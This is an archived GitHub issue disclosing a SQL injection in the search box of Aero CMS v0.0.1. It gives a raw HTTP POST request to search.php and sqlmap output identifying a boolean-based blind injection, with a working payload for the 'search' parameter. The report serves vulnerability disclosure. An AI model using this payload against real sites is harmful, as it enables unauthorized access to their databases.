This repository has been archived by the owner on May 8, 2023. It is now read-only.
Aero CMS v0.0.1 - SQL Injection (search box) #12
Comments
Sign up for free
to subscribe to this conversation on GitHub.
Already have an account?
Sign in.
POST /search.php HTTP/1.1
Host: 192.168.243.133
Content-Length: 19
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.243.133/
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.243.133/search.php
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=dt1o6jbah3s8qdti60pg464i59
Connection: close
search='saas&submit=
sqlmap identified the following injection point(s) with a total of 134 HTTP(s) requests:
Parameter: search (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: search=saas' OR NOT 8064=8064#&submit=
The text was updated successfully, but these errors were encountered: